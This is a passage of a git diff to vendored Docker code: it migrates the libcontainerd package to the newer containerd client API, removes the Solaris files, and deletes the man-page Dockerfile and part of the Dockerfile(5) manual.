io.EOF { - return err - } - - if n > 0 { - pid, err := strconv.ParseUint(string(b[:n]), 10, 64) - if err != nil { - return err - } - if utils.IsProcessAlive(int(pid)) { - logrus.Infof("libcontainerd: previous instance of containerd still alive (%d)", pid) - r.daemonPid = int(pid) - return nil - } - } - - // rewind the file - _, err = f.Seek(0, os.SEEK_SET) - if err != nil { - return err - } - - // Truncate it - err = f.Truncate(0) - if err != nil { - return err - } - - // Start a new instance - args := []string{ - "-l", fmt.Sprintf("unix://%s", r.rpcAddr), - "--metrics-interval=0", - "--start-timeout", "2m", - "--state-dir", filepath.Join(r.stateDir, containerdStateDir), - } - if goruntime.GOOS == "solaris" { - args = append(args, "--shim", "containerd-shim", "--runtime", "runc") - } else { - args = append(args, "--shim", "docker-containerd-shim") - if r.runtime != "" { - args = append(args, "--runtime") - args = append(args, r.runtime) - } - } - if r.debugLog { - args = append(args, "--debug") - } - if len(r.runtimeArgs) > 0 { - for _, v := range r.runtimeArgs { - args = append(args, "--runtime-args") - args = append(args, v) - } - logrus.Debugf("libcontainerd: runContainerdDaemon: runtimeArgs: %s", args) - } - - cmd := exec.Command(containerdBinary, args...) 
- // redirect containerd logs to docker logs - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.SysProcAttr = setSysProcAttr(true) - cmd.Env = nil - // clear the NOTIFY_SOCKET from the env when starting containerd - for _, e := range os.Environ() { - if !strings.HasPrefix(e, "NOTIFY_SOCKET") { - cmd.Env = append(cmd.Env, e) - } - } - if err := cmd.Start(); err != nil { - return err - } - logrus.Infof("libcontainerd: new containerd process, pid: %d", cmd.Process.Pid) - if err := setOOMScore(cmd.Process.Pid, r.oomScore); err != nil { - utils.KillProcess(cmd.Process.Pid) - return err - } - if _, err := f.WriteString(fmt.Sprintf("%d", cmd.Process.Pid)); err != nil { - utils.KillProcess(cmd.Process.Pid) - return err - } - - r.daemonWaitCh = make(chan struct{}) - go func() { - cmd.Wait() - close(r.daemonWaitCh) - }() // Reap our child when needed - r.daemonPid = cmd.Process.Pid - return nil -} - -// WithRemoteAddr sets the external containerd socket to connect to. -func WithRemoteAddr(addr string) RemoteOption { - return rpcAddr(addr) -} - -type rpcAddr string - -func (a rpcAddr) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.rpcAddr = string(a) - return nil - } - return fmt.Errorf("WithRemoteAddr option not supported for this remote") -} - -// WithRuntimePath sets the path of the runtime to be used as the -// default by containerd -func WithRuntimePath(rt string) RemoteOption { - return runtimePath(rt) -} - -type runtimePath string - -func (rt runtimePath) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.runtime = string(rt) - return nil - } - return fmt.Errorf("WithRuntime option not supported for this remote") -} - -// WithRuntimeArgs sets the list of runtime args passed to containerd -func WithRuntimeArgs(args []string) RemoteOption { - return runtimeArgs(args) -} - -type runtimeArgs []string - -func (rt runtimeArgs) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.runtimeArgs = rt - return nil - } 
- return fmt.Errorf("WithRuntimeArgs option not supported for this remote") -} - -// WithStartDaemon defines if libcontainerd should also run containerd daemon. -func WithStartDaemon(start bool) RemoteOption { - return startDaemon(start) -} - -type startDaemon bool - -func (s startDaemon) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.startDaemon = bool(s) - return nil - } - return fmt.Errorf("WithStartDaemon option not supported for this remote") -} - -// WithDebugLog defines if containerd debug logs will be enabled for daemon. -func WithDebugLog(debug bool) RemoteOption { - return debugLog(debug) -} - -type debugLog bool - -func (d debugLog) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.debugLog = bool(d) - return nil - } - return fmt.Errorf("WithDebugLog option not supported for this remote") -} - -// WithLiveRestore defines if containers are stopped on shutdown or restored. -func WithLiveRestore(v bool) RemoteOption { - return liveRestore(v) -} - -type liveRestore bool - -func (l liveRestore) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.liveRestore = bool(l) - for _, c := range remote.clients { - c.liveRestore = bool(l) - } - return nil - } - return fmt.Errorf("WithLiveRestore option not supported for this remote") -} - -// WithOOMScore defines the oom_score_adj to set for the containerd process. 
-func WithOOMScore(score int) RemoteOption { - return oomScore(score) -} - -type oomScore int - -func (o oomScore) Apply(r Remote) error { - if remote, ok := r.(*remote); ok { - remote.oomScore = int(o) - return nil - } - return fmt.Errorf("WithOOMScore option not supported for this remote") -} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_windows.go b/vendor/github.com/docker/docker/libcontainerd/remote_windows.go deleted file mode 100644 index 74c10447bb..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/remote_windows.go +++ /dev/null @@ -1,36 +0,0 @@ -package libcontainerd - -import "github.com/docker/docker/pkg/locker" - -type remote struct { -} - -func (r *remote) Client(b Backend) (Client, error) { - c := &client{ - clientCommon: clientCommon{ - backend: b, - containers: make(map[string]*container), - locker: locker.New(), - }, - } - return c, nil -} - -// Cleanup is a no-op on Windows. It is here to implement the interface. -func (r *remote) Cleanup() { -} - -func (r *remote) UpdateOptions(opts ...RemoteOption) error { - return nil -} - -// New creates a fresh instance of libcontainerd remote. On Windows, -// this is not used as there is no remote containerd process. -func New(_ string, _ ...RemoteOption) (Remote, error) { - return &remote{}, nil -} - -// WithLiveRestore is a noop on windows. 
-func WithLiveRestore(v bool) RemoteOption { - return nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/types.go b/vendor/github.com/docker/docker/libcontainerd/types.go index 3d981e3371..96ffbe2676 100644 --- a/vendor/github.com/docker/docker/libcontainerd/types.go +++ b/vendor/github.com/docker/docker/libcontainerd/types.go @@ -1,75 +1,108 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import ( - "io" + "context" + "time" - containerd "github.com/docker/containerd/api/grpc/types" + "github.com/containerd/containerd" + "github.com/containerd/containerd/cio" "github.com/opencontainers/runtime-spec/specs-go" - "golang.org/x/net/context" ) -// State constants used in state change reporting. +// EventType represents a possible event from libcontainerd +type EventType string + +// Event constants used when reporting events const ( - StateStart = "start-container" - StatePause = "pause" - StateResume = "resume" - StateExit = "exit" - StateRestore = "restore" - StateExitProcess = "exit-process" - StateOOM = "oom" // fake state + EventUnknown EventType = "unknown" + EventExit EventType = "exit" + EventOOM EventType = "oom" + EventCreate EventType = "create" + EventStart EventType = "start" + EventExecAdded EventType = "exec-added" + EventExecStarted EventType = "exec-started" + EventPaused EventType = "paused" + EventResumed EventType = "resumed" ) -// CommonStateInfo contains the state info common to all platforms. -type CommonStateInfo struct { // FIXME: event? 
- State string - Pid uint32 - ExitCode uint32 - ProcessID string +// Status represents the current status of a container +type Status string + +// Possible container statuses +const ( + // Running indicates the process is currently executing + StatusRunning Status = "running" + // Created indicates the process has been created within containerd but the + // user's defined process has not started + StatusCreated Status = "created" + // Stopped indicates that the process has ran and exited + StatusStopped Status = "stopped" + // Paused indicates that the process is currently paused + StatusPaused Status = "paused" + // Pausing indicates that the process is currently switching from a + // running state into a paused state + StatusPausing Status = "pausing" + // Unknown indicates that we could not determine the status from the runtime + StatusUnknown Status = "unknown" +) + +// Remote on Linux defines the accesspoint to the containerd grpc API. +// Remote on Windows is largely an unimplemented interface as there is +// no remote containerd. +type Remote interface { + // Client returns a new Client instance connected with given Backend. + NewClient(namespace string, backend Backend) (Client, error) + // Cleanup stops containerd if it was started by libcontainerd. + // Note this is not used on Windows as there is no remote containerd. + Cleanup() +} + +// RemoteOption allows to configure parameters of remotes. +// This is unused on Windows. +type RemoteOption interface { + Apply(Remote) error +} + +// EventInfo contains the event info +type EventInfo struct { + ContainerID string + ProcessID string + Pid uint32 + ExitCode uint32 + ExitedAt time.Time + OOMKilled bool + Error error } // Backend defines callbacks that the client of the library needs to implement. type Backend interface { - StateChanged(containerID string, state StateInfo) error + ProcessEvent(containerID string, event EventType, ei EventInfo) error } // Client provides access to containerd features. 
type Client interface { - GetServerVersion(ctx context.Context) (*ServerVersion, error) - Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error - Signal(containerID string, sig int) error - SignalProcess(containerID string, processFriendlyName string, sig int) error - AddProcess(ctx context.Context, containerID, processFriendlyName string, process Process, attachStdio StdioCallback) (int, error) - Resize(containerID, processFriendlyName string, width, height int) error - Pause(containerID string) error - Resume(containerID string) error - Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error - Stats(containerID string) (*Stats, error) - GetPidsForContainer(containerID string) ([]int, error) - Summary(containerID string) ([]Summary, error) - UpdateResources(containerID string, resources Resources) error - CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error - DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error - ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) -} + Version(ctx context.Context) (containerd.Version, error) -// CreateOption allows to configure parameters of container creation. -type CreateOption interface { - Apply(interface{}) error -} + Restore(ctx context.Context, containerID string, attachStdio StdioCallback) (alive bool, pid int, err error) -// StdioCallback is called to connect a container or process stdio. 
-type StdioCallback func(IOPipe) error + Create(ctx context.Context, containerID string, spec *specs.Spec, runtimeOptions interface{}) error + Start(ctx context.Context, containerID, checkpointDir string, withStdin bool, attachStdio StdioCallback) (pid int, err error) + SignalProcess(ctx context.Context, containerID, processID string, signal int) error + Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio StdioCallback) (int, error) + ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error + CloseStdin(ctx context.Context, containerID, processID string) error + Pause(ctx context.Context, containerID string) error + Resume(ctx context.Context, containerID string) error + Stats(ctx context.Context, containerID string) (*Stats, error) + ListPids(ctx context.Context, containerID string) ([]uint32, error) + Summary(ctx context.Context, containerID string) ([]Summary, error) + DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) + Delete(ctx context.Context, containerID string) error + Status(ctx context.Context, containerID string) (Status, error) -// IOPipe contains the stdio streams. -type IOPipe struct { - Stdin io.WriteCloser - Stdout io.ReadCloser - Stderr io.ReadCloser - Terminal bool // Whether stderr is connected on Windows + UpdateResources(ctx context.Context, containerID string, resources *Resources) error + CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error } -// ServerVersion contains version information as retrieved from the -// server -type ServerVersion struct { - containerd.GetServerVersionResponse -} +// StdioCallback is called to connect a container or process stdio. 
+type StdioCallback func(io *cio.DirectIO) (cio.IO, error) diff --git a/vendor/github.com/docker/docker/libcontainerd/types_linux.go b/vendor/github.com/docker/docker/libcontainerd/types_linux.go index cc2a17aec6..943382b9b0 100644 --- a/vendor/github.com/docker/docker/libcontainerd/types_linux.go +++ b/vendor/github.com/docker/docker/libcontainerd/types_linux.go @@ -1,49 +1,30 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import ( - containerd "github.com/docker/containerd/api/grpc/types" + "time" + + "github.com/containerd/cgroups" "github.com/opencontainers/runtime-spec/specs-go" ) -// Process contains information to start a specific application inside the container. -type Process struct { - // Terminal creates an interactive terminal for the container. - Terminal bool `json:"terminal"` - // User specifies user information for the process. - User *specs.User `json:"user"` - // Args specifies the binary and arguments for the application to execute. - Args []string `json:"args"` - // Env populates the process environment for the process. - Env []string `json:"env,omitempty"` - // Cwd is the current working directory for the process and must be - // relative to the container's root. - Cwd *string `json:"cwd"` - // Capabilities are linux capabilities that are kept for the container. - Capabilities []string `json:"capabilities,omitempty"` - // Rlimits specifies rlimit options to apply to the process. - Rlimits []specs.Rlimit `json:"rlimits,omitempty"` - // ApparmorProfile specifies the apparmor profile for the container. - ApparmorProfile *string `json:"apparmorProfile,omitempty"` - // SelinuxLabel specifies the selinux context that the container process is run as. - SelinuxLabel *string `json:"selinuxLabel,omitempty"` -} - -// StateInfo contains description about the new state container has entered. 
-type StateInfo struct { - CommonStateInfo +// Summary is not used on linux +type Summary struct{} - // Platform specific StateInfo - OOMKilled bool +// Stats holds metrics properties as returned by containerd +type Stats struct { + Read time.Time + Metrics *cgroups.Metrics } -// Stats contains a stats properties from containerd. -type Stats containerd.StatsResponse - -// Summary contains a container summary from containerd -type Summary struct{} +func interfaceToStats(read time.Time, v interface{}) *Stats { + return &Stats{ + Metrics: v.(*cgroups.Metrics), + Read: read, + } +} -// Resources defines updatable container resource values. -type Resources containerd.UpdateResource +// Resources defines updatable container resource values. TODO: it must match containerd upcoming API +type Resources specs.LinuxResources // Checkpoints contains the details of a checkpoint -type Checkpoints containerd.ListCheckpointResponse +type Checkpoints struct{} diff --git a/vendor/github.com/docker/docker/libcontainerd/types_solaris.go b/vendor/github.com/docker/docker/libcontainerd/types_solaris.go deleted file mode 100644 index dbafef669f..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/types_solaris.go +++ /dev/null @@ -1,43 +0,0 @@ -package libcontainerd - -import ( - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/opencontainers/runtime-spec/specs-go" -) - -// Process contains information to start a specific application inside the container. -type Process struct { - // Terminal creates an interactive terminal for the container. - Terminal bool `json:"terminal"` - // User specifies user information for the process. - User *specs.User `json:"user"` - // Args specifies the binary and arguments for the application to execute. - Args []string `json:"args"` - // Env populates the process environment for the process. 
- Env []string `json:"env,omitempty"` - // Cwd is the current working directory for the process and must be - // relative to the container's root. - Cwd *string `json:"cwd"` - // Capabilities are linux capabilities that are kept for the container. - Capabilities []string `json:"capabilities,omitempty"` -} - -// Stats contains a stats properties from containerd. -type Stats struct{} - -// Summary contains a container summary from containerd -type Summary struct{} - -// StateInfo contains description about the new state container has entered. -type StateInfo struct { - CommonStateInfo - - // Platform specific StateInfo - OOMKilled bool -} - -// Resources defines updatable container resource values. -type Resources struct{} - -// Checkpoints contains the details of a checkpoint -type Checkpoints containerd.ListCheckpointResponse diff --git a/vendor/github.com/docker/docker/libcontainerd/types_windows.go b/vendor/github.com/docker/docker/libcontainerd/types_windows.go index 24a9a96440..9041a2e8d5 100644 --- a/vendor/github.com/docker/docker/libcontainerd/types_windows.go +++ b/vendor/github.com/docker/docker/libcontainerd/types_windows.go @@ -1,71 +1,34 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import ( + "time" + "github.com/Microsoft/hcsshim" - "github.com/opencontainers/runtime-spec/specs-go" + opengcs "github.com/Microsoft/opengcs/client" ) -// Process contains information to start a specific application inside the container. -type Process specs.Process - // Summary contains a ProcessList item from HCS to support `top` type Summary hcsshim.ProcessListItem -// StateInfo contains description about the new state container has entered. -type StateInfo struct { - CommonStateInfo - - // Platform specific StateInfo - - UpdatePending bool // Indicates that there are some update operations pending that should be completed by a servicing container. 
+// Stats contains statistics from HCS +type Stats struct { + Read time.Time + HCSStats *hcsshim.Statistics } -// Stats contains statics from HCS -type Stats hcsshim.Statistics +func interfaceToStats(read time.Time, v interface{}) *Stats { + return &Stats{ + HCSStats: v.(*hcsshim.Statistics), + Read: read, + } +} // Resources defines updatable container resource values. type Resources struct{} -// ServicingOption is a CreateOption with a no-op application that signifies -// the container needs to be used for a Windows servicing operation. -type ServicingOption struct { - IsServicing bool -} - -// FlushOption is a CreateOption that signifies if the container should be -// started with flushes ignored until boot has completed. This is an optimisation -// for first boot of a container. -type FlushOption struct { - IgnoreFlushesDuringBoot bool -} - -// HyperVIsolationOption is a CreateOption that indicates whether the runtime -// should start the container as a Hyper-V container, and if so, the sandbox path. -type HyperVIsolationOption struct { - IsHyperV bool - SandboxPath string `json:",omitempty"` -} - -// LayerOption is a CreateOption that indicates to the runtime the layer folder -// and layer paths for a container. -type LayerOption struct { - // LayerFolder is the path to the current layer folder. Empty for Hyper-V containers. - LayerFolderPath string `json:",omitempty"` - // Layer paths of the parent layers - LayerPaths []string -} - -// NetworkEndpointsOption is a CreateOption that provides the runtime list -// of network endpoints to which a container should be attached during its creation. 
-type NetworkEndpointsOption struct { - Endpoints []string - AllowUnqualifiedDNSQuery bool -} - -// CredentialsOption is a CreateOption that indicates the credentials from -// a credential spec to be used to the runtime -type CredentialsOption struct { - Credentials string +// LCOWOption is a CreateOption required for LCOW configuration +type LCOWOption struct { + Config *opengcs.Config } // Checkpoint holds the details of a checkpoint (not supported in windows) diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_linux.go b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go index 78828bcdad..ce17d1963d 100644 --- a/vendor/github.com/docker/docker/libcontainerd/utils_linux.go +++ b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go @@ -1,62 +1,12 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" -import ( - "syscall" +import "syscall" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/opencontainers/runtime-spec/specs-go" -) - -func getRootIDs(s specs.Spec) (int, int, error) { - var hasUserns bool - for _, ns := range s.Linux.Namespaces { - if ns.Type == specs.UserNamespace { - hasUserns = true - break - } - } - if !hasUserns { - return 0, 0, nil - } - uid := hostIDFromMap(0, s.Linux.UIDMappings) - gid := hostIDFromMap(0, s.Linux.GIDMappings) - return uid, gid, nil -} - -func hostIDFromMap(id uint32, mp []specs.IDMapping) int { - for _, m := range mp { - if id >= m.ContainerID && id <= m.ContainerID+m.Size-1 { - return int(m.HostID + id - m.ContainerID) - } - } - return 0 -} - -func systemPid(ctr *containerd.Container) uint32 { - var pid uint32 - for _, p := range ctr.Processes { - if p.Pid == InitFriendlyName { - pid = p.SystemPid - } - } - return pid -} - -func convertRlimits(sr []specs.Rlimit) (cr []*containerd.Rlimit) { - for _, r := range sr { - cr = append(cr, &containerd.Rlimit{ - Type: r.Type, - Hard: r.Hard, - Soft: r.Soft, - }) - } - return -} - -// 
setPDeathSig sets the parent death signal to SIGKILL -func setSysProcAttr(sid bool) *syscall.SysProcAttr { +// containerdSysProcAttr returns the SysProcAttr to use when exec'ing +// containerd +func containerdSysProcAttr() *syscall.SysProcAttr { return &syscall.SysProcAttr{ - Setsid: sid, + Setsid: true, Pdeathsig: syscall.SIGKILL, } } diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go b/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go deleted file mode 100644 index 49632b45e5..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go +++ /dev/null @@ -1,27 +0,0 @@ -package libcontainerd - -import ( - "syscall" - - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/opencontainers/runtime-spec/specs-go" -) - -func getRootIDs(s specs.Spec) (int, int, error) { - return 0, 0, nil -} - -func systemPid(ctr *containerd.Container) uint32 { - var pid uint32 - for _, p := range ctr.Processes { - if p.Pid == InitFriendlyName { - pid = p.SystemPid - } - } - return pid -} - -// setPDeathSig sets the parent death signal to SIGKILL -func setSysProcAttr(sid bool) *syscall.SysProcAttr { - return nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go index 41ac40d2c2..fbf243d4f9 100644 --- a/vendor/github.com/docker/docker/libcontainerd/utils_windows.go +++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go @@ -1,6 +1,12 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" -import "strings" +import ( + "strings" + + "syscall" + + opengcs "github.com/Microsoft/opengcs/client" +) // setupEnvironmentVariables converts a string array of environment variables // into a map as required by the HCS. Source array is in format [v1=k1] [v2=k2] etc. 
@@ -15,32 +21,26 @@ func setupEnvironmentVariables(a []string) map[string]string { return r } -// Apply for a servicing option is a no-op. -func (s *ServicingOption) Apply(interface{}) error { - return nil -} - -// Apply for the flush option is a no-op. -func (f *FlushOption) Apply(interface{}) error { - return nil -} - -// Apply for the hypervisolation option is a no-op. -func (h *HyperVIsolationOption) Apply(interface{}) error { - return nil -} - -// Apply for the layer option is a no-op. -func (h *LayerOption) Apply(interface{}) error { +// Apply for the LCOW option is a no-op. +func (s *LCOWOption) Apply(interface{}) error { return nil } -// Apply for the network endpoints option is a no-op. -func (s *NetworkEndpointsOption) Apply(interface{}) error { - return nil +// debugGCS is a dirty hack for debugging for Linux Utility VMs. It simply +// runs a bunch of commands inside the UVM, but seriously aides in advanced debugging. +func (c *container) debugGCS() { + if c == nil || c.isWindows || c.hcsContainer == nil { + return + } + cfg := opengcs.Config{ + Uvm: c.hcsContainer, + UvmTimeoutSeconds: 600, + } + cfg.DebugGCS() } -// Apply for the credentials option is a no-op. 
-func (s *CredentialsOption) Apply(interface{}) error { +// containerdSysProcAttr returns the SysProcAttr to use when exec'ing +// containerd +func containerdSysProcAttr() *syscall.SysProcAttr { return nil } diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go index f3679bfb71..2e0c260eca 100644 --- a/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go +++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go @@ -1,4 +1,4 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import ( "testing" diff --git a/vendor/github.com/docker/docker/man/Dockerfile b/vendor/github.com/docker/docker/man/Dockerfile deleted file mode 100644 index 80e97ff01e..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile +++ /dev/null @@ -1,24 +0,0 @@ -FROM golang:1.7.5-alpine - -RUN apk add -U git bash curl gcc musl-dev make - -RUN mkdir -p /go/src /go/bin /go/pkg -RUN export GLIDE=v0.11.1; \ - export TARGET=/go/src/github.com/Masterminds; \ - mkdir -p ${TARGET} && \ - git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ - cd ${TARGET}/glide && \ - git checkout $GLIDE && \ - make build && \ - cp ./glide /usr/bin/glide && \ - cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* - -COPY glide.yaml /manvendor/ -COPY glide.lock /manvendor/ -WORKDIR /manvendor/ -RUN glide install && mv vendor src -ENV GOPATH=$GOPATH:/manvendor -RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man - -WORKDIR /go/src/github.com/docker/docker/ -ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.5.md b/vendor/github.com/docker/docker/man/Dockerfile.5.md deleted file mode 100644 index 5191b1930a..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile.5.md +++ /dev/null @@ -1,474 +0,0 @@ -% DOCKERFILE(5) Docker User Manuals -% Zac Dover -% May 2014 -# NAME - 
-Dockerfile - automate the steps of creating a Docker image - -# INTRODUCTION - -The **Dockerfile** is a configuration file that automates the steps of creating -a Docker image. It is similar to a Makefile. Docker reads instructions from the -**Dockerfile** to automate the steps otherwise performed manually to create an -image. To build an image, create a file called **Dockerfile**. - -The **Dockerfile** describes the steps taken to assemble the image. When the -**Dockerfile** has been created, call the `docker build` command, using the -path of directory that contains **Dockerfile** as the argument. - -# SYNOPSIS - -INSTRUCTION arguments - -For example: - - FROM image - -# DESCRIPTION - -A Dockerfile is a file that automates the steps of creating a Docker image. -A Dockerfile is similar to a Makefile. - -# USAGE - - docker build . - - -- Runs the steps and commits them, building a final image. - The path to the source repository defines where to find the context of the - build. The build is run by the Docker daemon, not the CLI. The whole - context must be transferred to the daemon. The Docker CLI reports - `"Sending build context to Docker daemon"` when the context is sent to the - daemon. - - ``` - docker build -t repository/tag . - ``` - - -- specifies a repository and tag at which to save the new image if the build - succeeds. The Docker daemon runs the steps one-by-one, committing the result - to a new image if necessary, before finally outputting the ID of the new - image. The Docker daemon automatically cleans up the context it is given. - - Docker re-uses intermediate images whenever possible. This significantly - accelerates the *docker build* process. - -# FORMAT - - `FROM image` - - `FROM image:tag` - - `FROM image@digest` - - -- The **FROM** instruction sets the base image for subsequent instructions. A - valid Dockerfile must have **FROM** as its first instruction. The image can be any - valid image. 
It is easy to start by pulling an image from the public - repositories. - - -- **FROM** must be the first non-comment instruction in Dockerfile. - - -- **FROM** may appear multiple times within a single Dockerfile in order to create - multiple images. Make a note of the last image ID output by the commit before - each new **FROM** command. - - -- If no tag is given to the **FROM** instruction, Docker applies the - `latest` tag. If the used tag does not exist, an error is returned. - - -- If no digest is given to the **FROM** instruction, Docker applies the - `latest` tag. If the used tag does not exist, an error is returned. - -**MAINTAINER** - -- **MAINTAINER** sets the Author field for the generated images. - Useful for providing users with an email or url for support. - -**RUN** - -- **RUN** has two forms: - - ``` - # the command is run in a shell - /bin/sh -c - RUN - - # Executable form - RUN ["executable", "param1", "param2"] - ``` - - - -- The **RUN** instruction executes any commands in a new layer on top of the current - image and commits the results. The committed image is used for the next step in - Dockerfile. - - -- Layering **RUN** instructions and generating commits conforms to the core - concepts of Docker where commits are cheap and containers can be created from - any point in the history of an image. This is similar to source control. The - exec form makes it possible to avoid shell string munging. The exec form makes - it possible to **RUN** commands using a base image that does not contain `/bin/sh`. - - Note that the exec form is parsed as a JSON array, which means that you must - use double-quotes (") around words not single-quotes ('). 
- -**CMD** - -- **CMD** has three forms: - - ``` - # Executable form - CMD ["executable", "param1", "param2"]` - - # Provide default arguments to ENTRYPOINT - CMD ["param1", "param2"]` - - # the command is run in a shell - /bin/sh -c - CMD command param1 param2 - ``` - - -- There should be only one **CMD** in a Dockerfile. If more than one **CMD** is listed, only - the last **CMD** takes effect. - The main purpose of a **CMD** is to provide defaults for an executing container. - These defaults may include an executable, or they can omit the executable. If - they omit the executable, an **ENTRYPOINT** must be specified. - When used in the shell or exec formats, the **CMD** instruction sets the command to - be executed when running the image. - If you use the shell form of the **CMD**, the `` executes in `/bin/sh -c`: - - Note that the exec form is parsed as a JSON array, which means that you must - use double-quotes (") around words not single-quotes ('). - - ``` - FROM ubuntu - CMD echo "This is a test." | wc - - ``` - - -- If you run **command** without a shell, then you must express the command as a - JSON array and give the full path to the executable. This array form is the - preferred form of **CMD**. All additional parameters must be individually expressed - as strings in the array: - - ``` - FROM ubuntu - CMD ["/usr/bin/wc","--help"] - ``` - - -- To make the container run the same executable every time, use **ENTRYPOINT** in - combination with **CMD**. - If the user specifies arguments to `docker run`, the specified commands - override the default in **CMD**. - Do not confuse **RUN** with **CMD**. **RUN** runs a command and commits the result. - **CMD** executes nothing at build time, but specifies the intended command for - the image. - -**LABEL** - -- `LABEL = [= ...]`or - ``` - LABEL [ ] - LABEL [ ] - ... - ``` - The **LABEL** instruction adds metadata to an image. A **LABEL** is a - key-value pair. 
To specify a **LABEL** without a value, simply use an empty - string. To include spaces within a **LABEL** value, use quotes and - backslashes as you would in command-line parsing. - - ``` - LABEL com.example.vendor="ACME Incorporated" - LABEL com.example.vendor "ACME Incorporated" - LABEL com.example.vendor.is-beta "" - LABEL com.example.vendor.is-beta= - LABEL com.example.vendor.is-beta="" - ``` - - An image can have more than one label. To specify multiple labels, separate - each key-value pair by a space. - - Labels are additive including `LABEL`s in `FROM` images. As the system - encounters and then applies a new label, new `key`s override any previous - labels with identical keys. - - To display an image's labels, use the `docker inspect` command. - -**EXPOSE** - -- `EXPOSE [...]` - The **EXPOSE** instruction informs Docker that the container listens on the - specified network ports at runtime. Docker uses this information to - interconnect containers using links and to set up port redirection on the host - system. - -**ENV** - -- `ENV ` - The **ENV** instruction sets the environment variable to - the value ``. This value is passed to all future - **RUN**, **ENTRYPOINT**, and **CMD** instructions. This is - functionally equivalent to prefixing the command with `=`. The - environment variables that are set with **ENV** persist when a container is run - from the resulting image. Use `docker inspect` to inspect these values, and - change them using `docker run --env =`. - - Note that setting "`ENV DEBIAN_FRONTEND noninteractive`" may cause - unintended consequences, because it will persist when the container is run - interactively, as with the following command: `docker run -t -i image bash` - -**ADD** - -- **ADD** has two forms: - - ``` - ADD - - # Required for paths with whitespace - ADD ["",... ""] - ``` - - The **ADD** instruction copies new files, directories - or remote file URLs to the filesystem of the container at path ``. 
- Multiple `` resources may be specified but if they are files or directories - then they must be relative to the source directory that is being built - (the context of the build). The `` is the absolute path, or path relative - to **WORKDIR**, into which the source is copied inside the target container. - If the `` argument is a local file in a recognized compression format - (tar, gzip, bzip2, etc) then it is unpacked at the specified `` in the - container's filesystem. Note that only local compressed files will be unpacked, - i.e., the URL download and archive unpacking features cannot be used together. - All new directories are created with mode 0755 and with the uid and gid of **0**. - -**COPY** - -- **COPY** has two forms: - - ``` - COPY - - # Required for paths with whitespace - COPY ["",... ""] - ``` - - The **COPY** instruction copies new files from `` and - adds them to the filesystem of the container at path . The `` must be - the path to a file or directory relative to the source directory that is - being built (the context of the build) or a remote file URL. The `` is an - absolute path, or a path relative to **WORKDIR**, into which the source will - be copied inside the target container. If you **COPY** an archive file it will - land in the container exactly as it appears in the build context without any - attempt to unpack it. All new files and directories are created with mode **0755** - and with the uid and gid of **0**. - -**ENTRYPOINT** - -- **ENTRYPOINT** has two forms: - - ``` - # executable form - ENTRYPOINT ["executable", "param1", "param2"]` - - # run command in a shell - /bin/sh -c - ENTRYPOINT command param1 param2 - ``` - - -- An **ENTRYPOINT** helps you configure a - container that can be run as an executable. When you specify an **ENTRYPOINT**, - the whole container runs as if it was only that executable. The **ENTRYPOINT** - instruction adds an entry command that is not overwritten when arguments are - passed to docker run. 
